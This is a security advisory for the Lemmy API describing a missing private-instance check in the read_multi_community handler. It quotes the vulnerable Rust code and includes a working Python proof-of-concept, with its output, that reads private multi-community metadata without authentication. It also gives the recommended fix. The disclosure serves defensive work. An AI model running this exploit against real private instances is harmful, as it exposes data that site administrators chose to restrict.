PT-2026-41494 · Crates.Io · Lemmy Api
Published
2026-05-06
·
Updated
2026-05-06
CVSS v3.1
5.3
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
NOTE: Only affects development version.
Summary
read multi community() does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.Details
Other read handlers load
local site and call check private instance() before returning data to unauthenticated callers. read multi community() does not call that helper:rust
pub async fn read multi community(
Query(data): Query<GetMultiCommunity>,
context: Data<LemmyContext>,
local user view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
let my person id = local user view.as ref().map(|l| l.person.id);
let id = resolve multi community identifier(&data.name, data.id, &context, &local user view)
.await?
.ok or(LemmyErrorType::NoIdGiven)?;
let multi community view =
MultiCommunityView::read(&mut context.pool(), id, my person id).await?;get community(), list posts(), list comments(), read person(), search(), and resolve object() all enforce the private-instance guard.Proof of Concept
The script creates a multi-community whose metadata contains a marker, turns on
private instance, confirms a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over GET /multi community without authentication.python
#!/usr/bin/env python3
import json, random, string
import requests
BASE = "http://127.0.0.1:8536/api/v4"
ADMIN USER = "lemmy"
ADMIN PASS = "lemmylemmy"
def api(method, path, token=None, **kw):
h = kw.pop("headers", {})
if token: h["Authorization"] = "Bearer " + token
return requests.request(method, BASE + path, headers=h, **kw)
suffix = "multi" + "".join(random.choice(string.ascii lowercase) for in range(6))
secret = "SECRET MULTI " + suffix
admin = api("POST", "/account/auth/login", json={"username or email": ADMIN USER, "password": ADMIN PASS}).json()["jwt"]
# Create a multi-community whose title/summary/sidebar embed the marker.
mid = api("POST", "/multi community", admin, json={
"name": "m" + suffix, "title": secret,
"summary": secret + " summary", "sidebar": secret + " sidebar",
}).json()["multi community view"]["multi"]["id"]
# Enable private instance.
api("PUT", "/site", admin, json={"private instance": True})
print("private instance:", api("GET", "/site").json()["site view"]["local site"]["private instance"])
# Control: a comparable read endpoint correctly rejects unauthenticated callers.
control = api("GET", "/community/list")
print("unauth /community/list (control):", control.status code, control.text[:120])
# Leak: read multi community returns the private metadata to an unauthenticated caller.
leak = api("GET", "/multi community", params={"id": mid})
print("unauth /multi community:", leak.status code, leak.text[:300])
print("contains secret:", secret in leak.text)Output:
text
private instance: True
unauth /community/list (control): 400 {"error":"instance is private","cause":"InstanceIsPrivate"}
unauth /multi community: 200 {"multi community view":{"multi":{"title":"SECRET MULTI multijwxokm","summary":"SECRET MULTI multijwxokm summary","sidebar":"SECRET MULTI multijwxokm sidebar"}}}
contains secret: TrueThe control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata.
Impact
An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists.
Recommended Fix
Load
local site at the start of read multi community() and call check private instance(&local user view, &local site)? before resolving or reading the multi-community.Found by aisafe.io
Fix
Missing Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Lemmy Api